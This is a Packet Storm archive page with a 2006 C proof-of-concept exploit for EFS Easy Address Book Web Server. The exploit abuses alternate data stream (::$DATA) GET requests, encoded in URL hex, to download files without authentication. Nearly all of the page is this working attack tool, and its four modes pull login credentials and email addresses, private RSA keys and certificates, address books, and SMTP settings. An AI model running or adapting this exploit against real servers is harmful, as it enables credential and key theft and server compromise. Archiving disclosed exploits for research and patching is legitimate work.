exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

efsStream.txt

efsStream.txt
Posted Nov 7, 2006
Authored by Greg Linares

EFS Easy Address Book web server versions 1.2 and below remote file stream exploit.

tags | exploit, remote, web
SHA-256 | d4914cf7bc4dd032087a23c8e5cc6f15f2b3d5407d2fb1331b5ae13379345bb4

efsStream.txt

Change Mirror Download
/*
==========================================================================
0-day Alternative File Stream Exploit for EFS Easy Address Book Web Server
===========================================================================
EFS' Easy Address Book Web Server is vulnerable to file stream exploits which
can be exploited remotely to access files without authentification.

This could lead to server compromise and/or sensitive information disclosure.


0-day Easy Address Book Web Server Alternative File Stream Exploit
Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com
This tool demonstrates EFS' Easy Address Book Web Server Vulnerability to Alternative
Data Stream GET requests which allow unauthorized users to download server
critical files.

Discovered and Reported: 11-1-2006

Usage: exploit <hostname/IP> [port 80=default] [Method see below]

--------PoC Methods:-----
1 = Gather all login username and passwords and email addresses.
2 = Gather Private RSA Keys and Certificates for server.
3 = Gather All Addressbooks and Contact Info on the server.
4 = Gather Server Settings File and SMTP server info.



*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h> /* Win32 API */
#include <wininet.h> /* WinInet API */
int mthd;
unsigned short httpport;
char exploit[512], exploit2[512], exploit3[512], exploit4[512], exploit5[512], exploit6[512];
char logmsg[512];
char endmsg[512];
HINTERNET inet; /* WinInet Internet Handle */
FILE *file;

void ExploitHTTP (HINTERNET inet, const char *host, const char *exp)
{

HINTERNET connection; /* Connection Handle */
HINTERNET request; /* Request Handle */
unsigned long flags; /* HttpOpenRequest Flags */

char buffer[BUFSIZ];
unsigned long len;


printf("HOST: %s\n", host);
printf("PORT: %i\n", httpport);

if ((connection = InternetConnect(inet, host, httpport,
NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0))
== NULL)
{
printf("Failed to Connect...Exiting\n");
InternetCloseHandle(inet);
fclose(file);
exit(1);
}

flags = INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_AUTO_REDIRECT |
INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_COOKIES |
INTERNET_FLAG_RELOAD;

strcat(exp, "%3A%3A%24%44%41%54%41");

request = HttpOpenRequest(connection, "GET", exp, "HTTP/1.0", NULL, NULL, flags, 0);
if (request == NULL)
{
printf("HTTP Open Request failed....Exiting\n");
InternetCloseHandle(connection);
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
if (!HttpSendRequest(request, NULL, 0, NULL, 0))
{
printf("HTTP Send Request failed....Exiting\n");
InternetCloseHandle(request);
InternetCloseHandle(connection);
InternetCloseHandle(inet);
fclose(file);
exit(1);
}
printf("Exploit Sent...Dumping HTTP Return Packet...");
sleep(1000);

while (InternetReadFile(request, buffer, sizeof buffer, &len) && len > 0)
{
fwrite(buffer, len, 1, file);
if (fwrite(buffer, len, 1, stdout) < 1)
{
printf("Error Outputting HTTP Return Packet\n");
}
}
InternetCloseHandle(request);
InternetCloseHandle(connection);
}


int main (int argc, char *argv[])
{

printf("\n=========================================================================\n");
printf("0-day Easy Address Book Web Server Alternative File Stream Exploit\n");
printf("Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com\n");
printf("This tool demonstrates EFS Address Book Server's Vulnerability to Alternative\n");
printf("Data Stream GET requests which allow unauthorized users to download server \n");
printf("critical files.\n");
printf("Discovered and Reported: 11-1-2006\n");
printf("\nUsage: %s <hostname/IP> [port 80=default] [Method see below]\n", argv[0]);
printf("--------PoC Methods:-----\n");
printf("1 = Gather all login username and passwords and email addresses.[Default]\n");
printf("2 = Gather Private RSA Keys and Certificates for server.\n");
printf("3 = Gather All Address Books and Contact Information on the server\n");
printf("4 = Gather Server Settings File and SMTP server info.\n");
printf("============================================================================\n");


inet = InternetOpen("ESF Exp", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (inet == NULL)
{
printf("Error accessing InternetOpen API - Exiting...\n");
exit(1);
}
if (argc < 2)
{
printf("Invalid # of arguments...Exiting\n");
exit(1);
}
if (atoi(argv[3]) > 4)
{
mthd = 1;
}
if (atoi(argv[3]) <= 0)
{
mthd = 1;
}
mthd = atoi(argv[3]);

/* Set Up Exploits */
switch(mthd)
{
case 1:
file = fopen("Accounts.txt","a+");
sprintf(exploit, "%s", "%2F%61%64%64%72%62%6F%6F%6B%2F%75%73%65%72%2E%73%64%62");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Accounts.txt\n");
break;
case 2:
file = fopen("RSAKeys.txt", "a+");
sprintf(exploit, "%s", "%53%65%72%76%65%72%4B%65%79%2E%70%65%6D");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to RSAKeys.txt\n");
break;
case 3:
file = fopen("AddrBooks.txt", "a+");
sprintf(exploit, "%s", "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%31%2E%73%64%62");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Messages.txt\n");
break;
case 4:
file = fopen("Server.txt", "a+");
sprintf(exploit, "%s", "%6F%70%74%69%6F%6E%2E%69%6E%69");
sprintf(endmsg, "%s", "\n\n\nResults Dumped to Server.txt\n");
break;
}



sprintf(logmsg, "%s", argv[1]);
sprintf(logmsg, "%s", "\r\n\r\n\r\n");
fwrite(logmsg, strlen(logmsg), 1, file);
httpport = atoi(argv[2]);
ExploitHTTP(inet, argv[1], exploit);
if (mthd == 3)
{
printf("\n\n Sending 2nd Exploit...\n");
strcat(exploit2, "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%32%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit2);
printf("\n\n Sending 3rd Exploit...\n");
strcat(exploit3, "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%33%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit3);
printf("\n\n Sending 4th Exploit...\n");
strcat(exploit4, "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%5F%75%73%65%72%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit4);
printf("\n\n Sending final Exploit...\n");
strcat(exploit5, "%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%67%72%6F%75%70%2E%73%64%62");
ExploitHTTP(inet, argv[1], exploit5);
}
if (mthd == 2)
{
printf("\n\n Sending 2nd Exploit...\n");
strcat(exploit2, "%53%65%72%76%65%72%43%65%72%74%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit2);
printf("\n\n Sending 3rd Exploit...\n");
strcat(exploit3, "%52%6F%6F%74%43%65%72%74%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit3);
printf("\n\n Sending 4th Exploit...\n");
strcat(exploit4, "%65%66%73%77%73%5F%6B%65%79%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit4);
printf("\n\n Sending 5th Exploit...\n");
strcat(exploit5, "%65%66%73%77%73%5F%72%65%71%2E%70%65%6D");
ExploitHTTP(inet, argv[1], exploit5);
printf("\n\n Sending final Exploit...\n");
strcat(exploit6, "%65%66%73%77%73%5F%72%61%6E%64%2E%74%78%74");
ExploitHTTP(inet, argv[1], exploit6);
}

fclose(file);
Sleep(500);
InternetCloseHandle(inet);
printf("\n\n===================================================\n");
printf("%s\n", endmsg);
printf("Proof Of Concept Exploit by Greg Linares\n");
printf("Send Comments/Concerns/Questions/Etc to GLinares.code [at] gmail [dot] com\n");
return 0;

}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close